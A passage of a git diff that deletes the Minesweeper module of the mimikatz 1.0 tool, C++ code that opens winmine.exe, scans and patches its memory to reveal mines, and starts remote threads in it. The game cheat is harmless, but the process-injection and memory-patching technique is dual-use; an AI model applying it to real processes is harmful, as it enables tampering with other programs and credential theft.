monDemineur.hauteur << L" lignes x " << monDemineur.longueur << L" colonnes" << endl << - L"Champ : " << endl << endl; - - for (DWORD y = 1; y <= monDemineur.hauteur; y++) - { - if(!cheat) - (*outputStream) << L'\t'; - - for(DWORD x = 1; x <= monDemineur.longueur; x++) - { - BYTE laCase = monDemineur.tabMines[y][x]; - - if(!cheat) - (*outputStream) << L' ' << static_cast<wchar_t>((laCase & 0x80) ? '*' : DISP_WINMINE[laCase & 0x0f]); - else if(laCase & 0x80) - monDemineur.tabMines[y][x] = 0x4e; - } - if(!cheat) - (*outputStream) << endl; - } - - if(cheat) - { - if(mod_memory::writeMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine)) - (*outputStream) << L"Patché ;)" << endl; - - vector<mod_windows::KIWI_HWND_ENTRY> mesHWNDS; - if(mod_windows::getHWNDsFromProcessId(&mesHWNDS, maStruct->pidWinmine)) - { - for(vector<mod_windows::KIWI_HWND_ENTRY>::iterator monHWND = mesHWNDS.begin(); monHWND != mesHWNDS.end(); monHWND++) - { - InvalidateRect(monHWND->monHandle, NULL, TRUE); - UpdateWindow(monHWND->monHandle); - } - } - } - } - CloseHandle(maStruct->hWinmine); - } - delete maStruct; - return true; -} - - -bool mod_mimikatz_winmine::pause(vector<wstring> * arguments) -{ - startThreadAt(FIELD_OFFSET(structHandleAndAddr, addrPause)); - return true; -} - -bool mod_mimikatz_winmine::reprise(vector<wstring> * arguments) -{ - startThreadAt(FIELD_OFFSET(structHandleAndAddr, addrResume)); - return true; -} - -bool mod_mimikatz_winmine::start(vector<wstring> * arguments) -{ - startThreadAt(FIELD_OFFSET(structHandleAndAddr, addrStart)); - return true; -} - -bool mod_mimikatz_winmine::startThreadAt(unsigned long structOffset) -{ - bool reussite = false; - structHandleAndAddr * maStruct = new structHandleAndAddr(); - if(giveHandleAndAddr(maStruct)) - { - if (HANDLE hRemoteThread = CreateRemoteThread(maStruct->hWinmine, NULL, 0, *reinterpret_cast<PTHREAD_START_ROUTINE *>(reinterpret_cast<PBYTE>(maStruct) + structOffset), NULL, 0, NULL)) - { - reussite = true; - WaitForSingleObject(hRemoteThread, INFINITE); - CloseHandle(hRemoteThread); - } - } - delete maStruct; - return reussite; -} - -bool mod_mimikatz_winmine::giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr) -{ - BYTE patternStartGame[] = {0x6a, 0x04, 0xeb, 0x02, 0x6a, 0x06, 0x5b, 0xa3}; - BYTE patternPause[] = {0x02, 0x75, 0x0a, 0xa1}; - BYTE patternReprise[] = {0x01, 0x74, 0x0a, 0xa1}; - BYTE patternStart[] = {0x53, 0x56, 0x57, 0x33, 0xff, 0x3b, 0x05}; - - RtlZeroMemory(monHandleAndAddr, sizeof(structHandleAndAddr)); - - wstring nomDemineur(L"winmine.exe"); - mod_process::KIWI_PROCESSENTRY32 monDemineur; - if(mod_process::getUniqueForName(&monDemineur, &nomDemineur)) - { - monHandleAndAddr->pidWinmine = monDemineur.th32ProcessID; - mod_process::KIWI_MODULEENTRY32 monModule; - if(mod_process::getUniqueModuleForName(&monModule, NULL, &monDemineur.th32ProcessID)) - { - PBYTE limit = monModule.modBaseAddr + monModule.modBaseSize, ptrTemp = NULL; - if(monHandleAndAddr->hWinmine = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, monDemineur.th32ProcessID)) - { - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternStartGame, &ptrTemp, sizeof(patternStartGame), true, monHandleAndAddr->hWinmine)) - if(mod_memory::readMemory(ptrTemp + sizeof(patternStartGame), &ptrTemp, sizeof(ULONG), monHandleAndAddr->hWinmine)) // high bits of ptrTemp are already at 00000000 - monHandleAndAddr->addrMonDemineur = reinterpret_cast<structMonDemineur *>(ptrTemp - sizeof(ULONG)); - - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternPause, &ptrTemp, sizeof(patternPause), true, monHandleAndAddr->hWinmine)) - monHandleAndAddr->addrPause = reinterpret_cast<PTHREAD_START_ROUTINE>(ptrTemp - 11); - - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternReprise, &ptrTemp, sizeof(patternReprise), true, monHandleAndAddr->hWinmine)) - monHandleAndAddr->addrResume = reinterpret_cast<PTHREAD_START_ROUTINE>(ptrTemp - 6); - - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, patternStart, &ptrTemp, sizeof(patternStart), true, monHandleAndAddr->hWinmine)) - monHandleAndAddr->addrStart = reinterpret_cast<PTHREAD_START_ROUTINE>(ptrTemp - 11); - } - } - } - - bool reussite = monHandleAndAddr->hWinmine && monHandleAndAddr->addrMonDemineur && monHandleAndAddr->addrStart && monHandleAndAddr->addrPause && monHandleAndAddr->addrResume; - - if(!reussite && monHandleAndAddr->hWinmine) - CloseHandle(monHandleAndAddr->hWinmine); - - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.h deleted file mode 100644 index 3870228..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.h +++ /dev/null @@ -1,45 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_windows.h" -#include <iostream> - -class mod_mimikatz_winmine -{ -private: - typedef struct structMonDemineur{ - DWORD32 nbMines; - DWORD32 longueur; - DWORD32 hauteur; - DWORD32 alignOffset; - BYTE tabMines[26][32]; - } structMonDemineur; - - typedef struct structHandleAndAddr{ - HANDLE hWinmine; - DWORD pidWinmine; - structMonDemineur * addrMonDemineur; - PTHREAD_START_ROUTINE addrPause; - PTHREAD_START_ROUTINE addrResume; - PTHREAD_START_ROUTINE addrStart; - } structHandleAndAddr; - - static bool giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr); - static bool startThreadAt(unsigned long structOffset); - static bool infosOrCheat(vector<wstring> * arguments, bool cheat = false); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool infos(vector<wstring> * arguments); - static bool start(vector<wstring> * arguments); - static bool pause(vector<wstring> * arguments); - static bool reprise(vector<wstring> * arguments); - static bool cheat(vector<wstring> * arguments); -}; |